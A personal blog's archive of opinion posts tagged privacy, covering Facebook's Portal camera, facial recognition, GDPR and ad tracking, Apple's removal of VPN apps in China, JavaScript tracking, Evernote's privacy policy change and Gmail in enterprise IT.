Showing all posts tagged privacy:

Be Smart, Use Dumb Devices

The latest news in the world of Things Which Are Too "Smart" For Their Users’ Good is that Facebook have released a new device in their Portal range: a video camera that sits on your TV and lets you make video calls via Facebook Messenger and WhatsApp (which is also owned by Facebook).

This is both a great idea and a terrible one. I am on the record as wanting a webcam for my AppleTV so that I could make FaceTime calls from there:

In fact, I already do the hacky version of this by mirroring my phone’s screen with AirPlay and then propping it up so the camera has an appropriate view.

Why would I do this? One-word answer: kids. The big screen has a better chance of holding their attention, and a camera with a nice wide field of view would be good too, to capture all the action. Getting everyone to sit on the couch or rug in front of the TV is easier than getting everyone to look into a phone (or even iPad). I’m not sure about the feature where the camera tries to follow the speaker; in these sorts of calls, several people are speaking most of the time, so I can see it getting very confused. It works well in boardroom setups where there is a single conversational thread, but even then, most of the good systems I’ve seen use two cameras, so that the view can switch in software rather than waiting for mechanical rotation.

So much for the "good idea" part. The reason it’s a terrible idea in this case is that it’s from Facebook. Nobody in their right mind would want an always-on device from Facebook in their living room, with a camera pointed at their couch, and listening in on the video calls they make. Facebook have shown time and time and time again that they simply cannot be trusted.

An example of why the problem is Facebook itself, rather than any one product or service, is the hardware switch for turning the device’s camera off. The highlight shows if the switch is in the off position, and a LED illuminates… to show that the camera and microphone are off.

Many people have commented that this setup looks like a classic dark pattern in UX, just implemented in hardware. My personal opinion is that the switch is more interesting as an indicator of Facebook’s corporate attitude to internet services: they are always on, and it’s an anomaly if they are off. In fact, they may even consider the design of this switch to be a positive move towards privacy, by highlighting when the device is in "privacy mode". The worrying aspect is that this design makes privacy an anomaly, a mode that is entered briefly for whatever reason, a bit like Private or Incognito mode in a web browser. If you’re wondering why a reasonable person might be concerned about Facebook’s attitude to user privacy, a quick read of just the "Privacy issues" section of the Wikipedia article on Facebook criticism will probably have you checking your permissions. At a bare minimum, I assume that entering "privacy mode" is itself a tracked event, subject to later analysis…

Trust, But Verify

IoT devices need a high degree of trust anyway because of all the information that they are inherently privy to. Facebook have proven that they will go to any lengths to gather information, including information that was deliberately not shared by users, process it for their own (and their advertising customers’) purposes, and do an utterly inadequate job of protecting it.

The idea of a smart home is attractive, no question – but why do the individual devices need to be smart in their own right? Unnecessary capabilities increase the vulnerability surface for abuse, either by a vendor/operator or by a malicious attacker. Instead, better to focus on devices which have the minimum required functionality to do their job, and no more.

A perfect example of this latter approach is IKEA’s collaboration with Sonos. The Symfonisk speakers are not "smart" in the sense that they have Alexa, Siri, or Google Assistant on board. They also do not connect directly to the Internet or to any one particular service. Instead, they rely on the owner’s smartphone to do all the hard work, whether that is running Spotify or interrogating Alexa. The speaker just plays music.

I would love a simple camera that perched on top of the TV, either as a peripheral to the AppleTV, or extending AirPlay to be able to use video sources as well. However, as long as doing this requires a full device from Facebook1 – or worse, plugging directly into a smart TV2 – I’ll keep on propping my phone up awkwardly and sharing the view to the TV.


  1. Or Google or Amazon – they’re not much better. 

  2. Sure, let my TV watch everything that is displayed and upload it for creepy "analysis".3 

  3. To be clear, I’m not wearing a tinfoil hat over here. I have no problem simply adding a "+1" to the viewer count for The Expanse or whatever, but there’s a lot more that goes on my TV screen: photos of my kids, the content of my video calls, and so on and so forth. I would not be okay with sharing the entire video buffer with unknown third parties. This sort of nonsense is why my TV has never been connected to the WiFi. It went online once, using an Ethernet cable, to get a firmware update – and then I unplugged the cable. 

Once More On Privacy

Facebook is in court yet again over the Cambridge Analytica scandal, and one of their lawyers made a most revealing assertion :

There is no invasion of privacy at all, because there is no privacy

Now on one level, this is literally true. Facebook's lawyer went on to say that:

Facebook was nothing more than a "digital town square" where users voluntarily give up their private information

The issue is a mismatch in expectations. Users have the option to disclose information as fully public, or variously restricted: only to their friends, or to members of certain groups. The fact that something is said in the public street does not mean that the user would be comfortable having it published in a newspaper, especially if they were whispering into a friend’s ear at the time.

Legally, Facebook may well be in the right (IANAL, nor do I play one on the Internet), but in terms of users’ expectations, they are undoubtedly in the wrong. However, for once I do not lay all the blame on Facebook.

Mechanisation and automation are rapidly subverting common-sense expectations in a number of fields, and consequences can be wide-reaching. Privacy is one obvious example, whether it is Facebook’s or Google’s analysis of our supposedly private conversations, or facial recognition in public places.

For an example of the reaction to the deployment of these technologies, the city of San Francisco, generally expected to be an early adopter of technological solutions, recently banned the use of facial recognition technology. While the benefits for law enforcement of ubiquitous automated facial recognition are obvious, the adoption of this technology also subverts long-standing expectations of privacy – even in undoubtedly public spaces. While it is true that I can be seen and possibly recognised by anyone who is in the street at the same time as me, the human expectation is that I am not creating a permanent, searchable record of my presence in the street at that time, nor that such a record would be widely available.

To make the example concrete, let’s talk for a moment about numberplate recognition. Cars and other motor vehicles have number plates to make them recognisable, including for law enforcement purposes. As technology developed, automated reading of license plates became possible, and is now widely adopted for speed limit enforcement. Around here things have gone a step further, with average speeds measured over long distances.

Who could object to enforcing the law?

The problem with automated enforcement is that it is only as good as it is programmed to be. It is true that hardly anybody breaks the speed limit on the monitored stretches of motorway any more – or at least, not more than once. However, there are also a number of negative consequences. Lane discipline has fallen entirely by the wayside since the automated systems were introduced, with slow vehicles cruising in the middle or even outside lanes, with empty lanes on the inside. The automated enforcement has also removed any pressure to consider what is an appropriate speed for the conditions, with many drivers continuing to drive at or near the speed limit even in weather or traffic conditions where that speed is totally unsafe. Finally, there is no recognition that, at 4am with nobody on the roads, there is no need to enforce the same speed limit that applies at rush hour.

Human-powered on-the-spot enforcement – the traffic cop flagging down individual motorists – had the option to modulate the law, turning a blind eye to safe speed and punishing driving that might be inside the speed limit but unsafe in other ways. Instead, automated enforcement is dumb (it is, after all, binary) and only considers the single metric it was designed to consider.

There are of course any number of problems with a human-powered approach as well; members of ethnic or social minorities all have stories involving the police looking for something – anything – to book them for. I’m a straight white cis-het guy, and still once managed to fall foul of the proverbial bored cops, who took my entire car apart looking for drugs (that weren’t there) and then left me by the side of the road to put everything back together. However, automated enforcement makes all of these problems worse.

Facial recognition has documented issues with accuracy when it comes to ethnic minorities and women – basically anyone but the white male programmers who created the systems. If police start relying on such systems, people are going to have serious difficulties trying to prove that they are not the person in the WANTED poster – because the computer says they are a match. And that’s if they don’t just get gunned down, of course.

It is notoriously hard to opt out of these systems when they are used for advertising, but when they are used for law enforcement, it becomes entirely impossible to opt out, as a London man found when he was arrested for covering his face during a facial recognition trial on public streets. A faulty system is even worse than a functional one, as its failure modes are unpredictable.

Systems rely on data, and data storage is also problematic. I recently had to get a government-issued electronic ID. Normally this should be a simple online application, but I kept getting weird errors, so I went to the office with my (physical) ID instead. There, we realised that the problem was with my place of birth. I was born in what was then Strathclyde, but this is no longer an option in up-to-date systems, since the region was abolished in 1996. However, different databases were disagreeing, and we were unable to move forward. In the end, the official effectively helped me to lie to the computer, picking an acceptable jurisdiction in order to move forwards in the process – and thereby of course creating even more inaccuracies and inconsistency. So much for "the computer is always right"… Remember, kids: Garbage In, Garbage Out!

What, Me Worry?

The final argument comes down, as it always does with privacy, to the objection that "there’s nothing to fear if you haven’t done anything wrong". Leaving aside the issues we just discussed around the possibility of running into problems even when you really haven’t done anything wrong, the issue is with the definition of "wrong". Social change is often driven by movement in the grey areas of the law, as well as selective enforcement of those laws. First gay sex is criminalised, so underground gay communities spring up. Then attitudes change, but the laws are still on the books; they just aren’t enforced. Finally the law catches up. If algorithms actually are watching all of our activity and are able to infer when we might be doing something that’s frowned upon by some1, that changes the dynamic very significantly, in ways which we have not properly considered as a society.

And that’s without even considering where else these technologies might be applied, beyond our pleasant Western bubble. What about China, busy turning Xinjiang into an open-air prison for the Uyghur minority? Or "Saudi" Arabia, distributing smartphone apps to enable husbands to deny their wives permission to travel?

Expectations of privacy are being subverted by scale and automation, without a real conversation about what that means. Advertisers and the government stick to the letter of the law, but there is no recognition of the material difference between surveillance that is human-powered, and what happens when the same surveillance is automated.


Photo by Glen Carrie and Bryan Hansonvia Unsplash


  1. And remember, the algorithms may not even be analysing your own data, which you carefully secured and locked down. They may have access to data for one of your friends or acquaintances, and then the algorithm spots a correlation in patterns of communication, and associates you with them. Congratulations, you now have a shadow profile. And what if you are just really unlucky in your choice of local boozer, so now the government thinks you are affiliated with the IRA offshoot du jour, when all you were after was a decent pint of Guinness? 

Advertise With The End In Mind

Even though I no longer work directly in marketing, I’m still adjacent, and so I try to keep up to date with what is going on in the industry. One of the most common-sensical and readable voices is Bob Hoffman, perhaps better known as the Ad Contrarian. His latest post is entitled The Simple-Minded Guide To Marketing Communication, and it helpfully dissects the difference between brand advertising and direct-response advertising (emphasis mine):

[…] our industry's current obsession with precision targeted, one-to-one advertising is misguided. Precision targeting may be valuable for direct response. But history shows us that direct response strategies have a very low likelihood of producing major consumer facing brands. Building a big brand requires widespread attention. Precision targeted, one-to-one communication has a low likelihood of delivering widespread attention.

Now Bob is not just an armchair critic; he has quite the cursus honorum in the advertising industry, and so he speaks from experience.

In fact, events earlier this week bore out his central thesis. With the advent of GDPR, many US-based websites opted to cut off EMEA readers rather than attempt to comply with the law. This action helpfully made it clear who was doing shady things with their users’ data, thereby providing a valuable service to US readers, while rarely inconveniencing European readers very much.

The New York Times, with its strong international readership, was not willing to cut off overseas ad revenue. Instead, they went down a different route (emphasis still mine):

The publisher blocked all open-exchange ad buying on its European pages, followed swiftly by behavioral targeting. Instead, NYT International focused on contextual and geographical targeting for programmatic guaranteed and private marketplace deals and has not seen ad revenues drop as a result, according to Jean-Christophe Demarta, svp for global advertising at New York Times International.

Digiday has more details, but that quote has the salient facts: turning off invasive tracking – and the targeted advertising which relies on it – had no negative results whatsoever.

This is of course because knowing someone is reading the NYT, and perhaps which section, is quite enough information to know whether they are an attractive target for a brand to advertise to. Nobody has ever deliberately clicked from serious geopolitical analysis to online impulse shopping. However, the awareness of a brand and its association with Serious Reporting will linger in readers’ minds for a long time.

The NYT sells its own ads, which is not really scalable for most outlets, but I hope other people are paying attention. Maybe there is room in the market for an advertising offering that does not force users to deal with cookies and surveillance and interstitial screens and page clutter and general creepiness and annoyance, while still delivering the goods for its clients?


🖼️ Photo by Kate Trysh on Unsplash

The Shape Of 2019

They said they need real-world examples, but I don’t want to be their real-world mistake

That quote comes from a NYT story about people attacking self-driving vehicles. I wrote about these sentiments before, after the incident which spurred these attacks:

It’s said that you shouldn’t buy any 1.0 product unless you are willing to tolerate significant imperfections. Would you ride in a car operated by software with significant imperfections?
Would you cross the street in front of one?
And shouldn’t you have the choice to make that call?

Cars are just the biggest manifestation of this experimentation that is visible in the real world. How often do we have to read about Facebook manipulating the content of users’ feeds – just to see what happens?

And what about this horrific case?

Meanwhile, my details were included in last year’s big Marriott hack, and now I find out that my passport details may have been included in the leaked information. Marriott’s helpful suggestion? A year’s free service – from Experian. Yes, that Experian, the one you know from one of the biggest hacks ever.

I don’t want to be any company’s real world mistake in 2019.


🖼️ Photo by chuttersnap on Unsplash

Privacy Policy

Short version: I don’t have one.

Long version: I don’t gather any data, I even turned off Google Analytics (and not just because it was depressing me with its minuscule numbers!), and I don’t have access to the server logs even if I wanted to look at IP addresses or whatever. This blog’s host, Postach.io, have their own privacy policy here.

Regarding analytics specifically, I am somewhat curious about how many people read individual posts, but I’m not going to sell you out to Google so you can see adverts for whatever you read about here following you all over the internet for the next two weeks. Neither of us gets enough benefit for that to be worthwhile.

Privacy Versus AI

There is a widespread assumption in tech circles that privacy and (useful) AI are mutually exclusive. Apple is assumed to be behind Amazon and Google in this race because of its choice to do most data processing locally on the phone, instead of uploading users’ private data in bulk to the cloud.

A recent example of this attitude comes courtesy of The Register:

Predicting an eventual upturn in the sagging smartphone market, [Gartner] research director Ranjit Atwal told The Reg that while artificial intelligence has proven key to making phones more useful by removing friction from transactions, AI required more permissive use of data to deliver. An example he cited was Uber "knowing" from your calendar that you needed a lift from the airport.

I really, really resent this assumption that connecting these services requires each and every one of them to have access to everything about me. I might not want information about my upcoming flight shared with Uber – where it can be accessed improperly, leading to someone knowing I am away from home and planning a burglary at my house. Instead, I want my phone to know that I have an upcoming flight, and offer to call me an Uber to the airport. At that point, of course I am sharing information with Uber, but I am also getting value out of it. Otherwise, the only one getting value is Uber. They get to see how many people in a particular geographical area received a suggestion to take an Uber and declined it, so they can then target those people with special offers or other marketing to persuade them to use Uber next time they have to get to the airport.

I might be happy sharing a monthly aggregate of my trips with the government – so many by car, so many on foot, or by bicycle, public transport, or ride sharing service – which they could use for better planning. I would absolutely not be okay with sharing details of every trip in real time, or giving every busybody the right to query my location in real time.

The fact that so much of the debate is taken up with unproductive discussions is what is preventing progress here. I have written about this concept of granular privacy controls before:

The government sets up an IDDB which has all of everyone's information in it; so far, so icky. But here's the thing: set it up so that individuals can grant access to specific data in that DB - such as the address. Instead of telling various credit card companies, utilities, magazine companies, Amazon, and everyone else my new address, I just update it in the IDDB, and bam, those companies' tokens automatically update too - assuming I don't revoke access in the mean time.

This could also be useful for all sorts of other things, like marital status, insurance, healthcare, and so on. Segregated, granular access to the information is the name of the game. Instead of letting government agencies and private companies read all the data, users each get access only to those data they need to do their jobs.

Unfortunately, we are stuck in an stale all-or-nothing discussion: either you surround yourself with always-on internet-connected microphones and cameras, or you might as well retreat to a shack in the woods. There is a middle ground, and I wish more people (besides Apple) recognised that.


Photo by Kyle Glenn on Unsplash

Sowing Bitter Seeds

The Internet is outraged by… well, a whole lot of things, as usual, but in particular by Apple. For once, however, the issue is not phones that are both unexciting and unavailable, lacking innovation and wilfully discarding convention, and also both over- and under-priced. No, this time the issue is apps, and in particular VPN apps.

Authoritarian regimes around the world (Russia, "Saudi" Arabia, China, North Korea, etc) have long sought to control their populations' access to information in general, and to the Internet in particular. Of course anyone with a modicum of technical savvy - or a friend, relative, or passing acquaintance willing to do the simple setup - can keep unfettered access to the Internet by going through a Virtual Private Network, or VPN.

A VPN does what it says on the tin: it creates a virtual network that connects directly with an endpoint somewhere else; importantly, somewhere outside the authoritarian regime's control. As such, VPNs have always existed in something of a grey area, but now China (the People's Republic, not that other China) has gone ahead and formally banned their use.

In turn, Apple have responded by removing unregistered VPN apps (which in practical terms means all of them) from their App Store in China. In the face of the Internet's predictable outrage, Apple provided this bald statement (via TechChrunch):

Earlier this year China’s MIIT announced that all developers offering VPNs must obtain a license from the government. We have been required to remove some VPN apps in China that do not meet the new regulations. These apps remain available in all other markets where they do business.

Now Apple do have a point; the law is indeed the law, and because they operate in China, they need to enforce it, just as they would with laws in any other country.

Here's the rub, though. By the regionalised way they have set up their App Store service, they have made themselves unnecessarily vulnerable to this sort of arm-twisting by unfriendly governments. Last time I wrote about geo-fencing and its consequences, the cause of the day was Russia demanding removal of the LinkedIn app, and China (them again!) demanding removal of the New York Times app. As I wrote at the time, companies like Apple originally set up the infrastructure for these geographic restrictions to enable IP protection, but the same tools are being repurposed for censorship:

This sort of restriction used to be “just" hostile to consumers. Now, it is turning into a weapon that authoritarian regimes can wield against Apple, Google, and whoever else. Nobody would allow Russia to ban LinkedIn around the world, or China to remove the New York Times app everywhere - but because dedicated App Stores exist for .ru and .cn, they are able to demand these bans as local exceptions, and even defend them as respecting local laws and sensibilities. If there were one worldwide App Store, this gambit would not work.

The argument against the infrastructure of laws and regulations that was put in place to enable (ineffective) IP restrictions was always that it could be, and would be, repurposed to enable repression by authoritarian regimes. People scoffed at these privacy concerns, saying "if you have nothing to hide, you have nothing to fear". But what if your government is the next to decide that reading the NYT or having a LinkedIn profile is against the law? How scared should you be then?

If you are designing a social network or other system with the expectation of widespread adoption, these days this has to be part of your threat model. Otherwise, one day the government may come knocking, demanding your user database for any reason or no reason at all - and what seemed like a good idea at the time will end up messing up a lot of people's lives.

Product designers by and large do not think of such things, as we saw when Amazon decided that it would be perfectly reasonable to give everyone in your address book access to your Alexa device - and make it so users could not turn off this feature without a telephone call to Amazon support.

How well do you think that would go down if you were a dissident, or just in the social circle of one?

Our instinctive attitude to data is to hoard them, but this instinct is obsolete, forged in a time when data were hard to gather, store, and access. It took something on the scale of the Stasi to build and maintain profiles on even six million citizens (out of a population of sixteen million), and the effort and expense was part of what broke the East German regime in the end. These days, it's trivial to build and access such a profile for pretty much anyone, so we need to change our thinking about data - how we gather them, and how we treat them once we have them.

Personal data are more akin to toxic waste, generated as a byproduct of valuable activity and needing to be stored with extreme care because of the dire consequences of any leaks. Luckily, data are different from toxic waste in one key respect: they can be deleted, or better, never gathered in the first place. The same goes for many other choices, such as restricting users to one particular geographical App Store, or making it easy to share your entire contact list (including by mistake), but very difficult to take that decision back.

What other design decisions are being made today based on obsolete assumptions that will come back to bite users in the future?


UPDATE: And there we go, now Russia is following China’s example and banning VPNs as well. The idea of a technical fix to social and legal problems is always a short-term illusion.


Image by Sean DuBois via Unsplash

The Enemy Within The Browser

At what point do the downsides of Javascript in the browser exceed the upsides? Have we already passed that point?

If you have any concept of security, the idea of downloading code from the Internet and immediately executing it, sight unseen, on your local machine, should give you the screaming heebie-jeebies. A lot of work has gone into sandboxing the browser processes so that Javascript cannot escape the browser itself, and later, the individual web page that it came from. However, this only dealt with the immediate and obvious vulnerability.

These days, the problem with Javascript is that it is used to track users all over the internet and serve them ads for the same products on every site. Quite why this requires 14 MB and 330 HTTP requests for 537 words is not entirely clear.

Actually, no, it is entirely clear: it is because the copro-grammers ("writers of feces") who produce this stuff have no respect for the users. The same utter disrespect underlies the recent bloat in iOS apps:

One Friday I turned off auto-update for apps and let the update queue build up for a week. The results shocked me.
After the first week I had 7.59GB of updates to install, spread across 67 apps – averaging 113MB per app.

Okay, so maybe you say who cares, you only update apps over wifi - but do you only browse on wifi? 14 MB for a few hundred words - that adds up fast.

And what else is that Javascript up to, beyond wasting bytes - both over the air, and in local storage?

How about snaflling data entered into a form, regardless of whether it has been submitted?

Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.

My house, my rules. I look forward to iOS 11, and enabling every blocking feature I can.

I really want media sites to earn money so that they can continue to exist, but they cannot do it at my expense. A banner ad is fine, but 14 MB of Javascript to serve me the same banner ad everywhere - at my expense! - is beyond the pale.

Javascript delenda est.

How To Lose Friends and Influence People

I am a huge fan of Evernote. I have used their software for many years, and its many features are key parts of my workflow. I take notes on multiple devices, use tagging to sync between those devices, take snapshots of business cards and let the OCR and the access to LinkedIn sort out the details, annotate images and PDFs, and more.

I should say, I used to be a fan of Evernote. They recently made some changes to their privacy policy that have users up in arms. Here is the relevant entry from their changelog:

Privacy Policy

January 23, 2017 updates to the October 4, 2016 version:

We clarified that in building a more personalized Evernote service that can adapt to the way you think and work, a small group of engineers may need to oversee these automated technologies to ensure they are working as intended. Also, we added that we will be using data from other sources to tailor your Evernote experience and explain how you can get more out of your Evernote account. Please see our FAQ for more information on these changes.

Updates to our legal documents | Evernote

This may be fairly inoffensive, but it is worrying to me and to many users. These days, “personalisation" is often code for "gathering data indiscriminately for obscure purposes that may change at any time". This exchange is generally presented as a bargain where users sacrifice (some) privacy to the likes of Google in exchange for free use of their excellent services such as Gmail or Maps.

Evernote's case is different. As a paid app, we users like to assume that we are opting out of that bargain, and paying directly for our services - instead of paying indirectly by authorising Evernote to resell our personal data to advertisers.

In addition, we use Evernote to store data that may be personal, sensitive, or both. Evernote have always had some weasel words in their Privacy Policy about their employees having access to our notes:

  • We believe our Terms of Service has been violated and confirmation is required or we otherwise have an obligation to review your account Content as described in our Terms of Service;
  • We need to do so for troubleshooting purposes or to maintain and improve the Service;
  • Where necessary to protect the rights, property or personal safety of Evernote and its users (including to protect against potential spam, malware or other security concerns); or
  • In order to comply with our legal obligations, such as responding to warrants, court orders or other legal process. We vigilantly protect the privacy of your account Content and, whenever we determine it possible, we provide you with notice if we believe we are compelled to comply with a third party’s request for information about your account. Please visit our Information for Authorities page for more information.

So basically, Evernote employees have always had access to our stuff. This part of the privacy policy has not changed substantially, but the changes are worrying (emphasis mine):

  • New: Do Evernote Employees Access or Review My Data?
  • Old: Do Evernote Employees Access or Review My Notes?

  • New: Below are the limited circumstances in which we may need to access or review your account information or Content:

  • Old: As a rule, Evernote employees do not monitor or view your personal information or Content stored in the Service, but we list below the limited circumstances in which our employees may need to access or review your personal information or account Content:

  • New: We need to do so for troubleshooting purposes or to maintain and improve the Service;

  • Old: We need to do so for troubleshooting purposes;

Privacy Policy | Evernote
Privacy Policy - 2017 update

Now, here is why people are all up in arms. We would like service providers to tread extremely carefully when it comes to our personal data, accessing it only when warranted. 2016 has provided plenty of object lessons in why we are so sensitive; just today I received an email from Yahoo detailing their latest hack. Yahoo hack: Should I panic? - BBC News

In this case, Evernote appear to have made two mistakes. First, they designed and built a new functionality that requires access to users’ personal data and content in order to do… well, it’s not entirely clear what they want to do, beyond the fact that it involves machine learning.

Secondly, they completely mis-handled the communication of this change. I mean, they even removed the disclaimer that “As a rule, Evernote employees do not monitor or view your personal information or Content stored in the Service"! How tone-deaf can you get?

It’s also very unclear why they even made this change. In their response to the outrage, they say this:

We believe we can make our users even more productive with technologies such as machine learning that will allow you to automate functions you now have to do manually, like creating to-do lists or putting together travel itineraries.

A Note From Chris O’Neill about Evernote’s Privacy Policy

The problem is, users are perfectly capable of managing to-do lists and itineraries, and based on an informal sample of Twitter reactions to this new policy, do not see enough value to want to give unknown Evernote employees access to their data.

An unforced error

This is such a short-sighted decision by Evernote. As one of the few cloud services which is used primarily through fat clients, Evernote is in a privileged position when it comes to pushing processing out to the users’ devices.

Apple have the same advantage, and do the right thing with it: instead of snooping around in my mail and calendar on the server side, my local Mail app can detect dates in messages and offer to create appointments in Calendar. Also, CloudKit’s sync services are encrypted, so nobody at Apple has access to my data - not even if law enforcement asks.

Evernote have chosen not to take that approach, and have not (yet) clarified any benefit that they expect or promise to deliver by doing so. This mis-step has now caused loyal, paying users like me to re-evaluate everything else about the service. At this point, even cancelling the new machine-learning service would not be enough to mollify users; nothing short of a new and explicit commitment to complete encryption of user data - including from Evernote employees! - would suffice.

Evernote's loss will be someone else’s gain

One possible winner from this whole mess is Bear, a new note-taking app that does use CloudKit and therefore is able to provide that encryption at rest that Evernote does not.

Bear - Notes for iPhone, iPad and Mac

The Bear team have even been having some fun on Twitter at Evernote’s expense:

I composed this post in Bear, and I have to say, it is very nice. I copied it over to Evernote to publish here, but it’s the first crack. Before this mess, I was a vocal advocate of Evernote. Now? I am actively evaluating alternatives.

Respect your users, yo.

One more time

I have worked all my career in enterprise IT, either as a sysadmin, or for vendors of enterprise IT tools. There are many annoyances in big-company IT, but one of the most frustrating is when people miss key aspects of what makes corporate IT tick.

One area is the difference between a brand-new startup whose entire IT estate consists of a handful of bestickered MacBooks, and a decades-old corporation with the legacy IT that history brings. Case in point: Google is stealing away Microsoft’s future corporate customers.

Basically, it turns out that - to absolutely nobody's surprise - startups overwhelmingly use Google's email services. Guess what? Running your own email server for just a few users is not a highly differentiating activity, so it makes sense to hand it off to Google. Big companies on the other hand have a legacy that means it makes sense to stick with what they have and know, which generally means Microsoft Exchange.

So far, so good. The key factor that is missing in this analysis is time. What happens when those startups grow to become mid-size companies or even join the Fortune 50 themselves? Do they stick with Google's relatively simple services, or do they need to transition at some point to an "enterprise" email solution?

It is now clear that Google does deep inspection of email contents. So far, this appears to be done for good: Paedophile snared as Google scans Gmail for images of child abuse. However, if I were in a business that competes with Google - and these days, that could be anything - I would feel distinctly uncomfortable about that.

There are also problems of corporate policy and compliance that apply to proper grown-up companies. At the simplest level, people often have their own personal Gmail accounts as well, and with Google's decision to use that login for all their services, there is enormous potential for bleed-over between the two domains. At a more complex level, certain types of data may be required to be stored in such a way that no third parties (such as Google) have access to them. Gmail would not work for that requirement either.

Simply put, startups have different needs from big established corporations. The impact of full-time IT staff on small startup is huge. The alternative of doing your own support doesn't work either, because every hour spent setting up, maintaining or troubleshooting IT infrastructure is an hour that you don't spend working on your actual product. For a big corporation with thousands of employees, on the other hand, it makes a lot of sense to dedicate a few to in-house IT support, especially if the alternatives include major fines or even seeing managers go to jail. The trend Quartz identified is interesting, but it's a snapshot of a point in time. What would be more interesting would be to see the trend as those companies grow and change from one category to another.

Corollary to this is that business IT is not consumer IT. Trying to mix the two is a recipe for disaster. Big B2B vendors end up looking very silly when they try to copy Apple, and journalists look just as silly when they fail to understand key facts about the differences between B2B and consumer IT, and between small-company IT and big-company IT.


Image by Philipp Henzler via Unsplash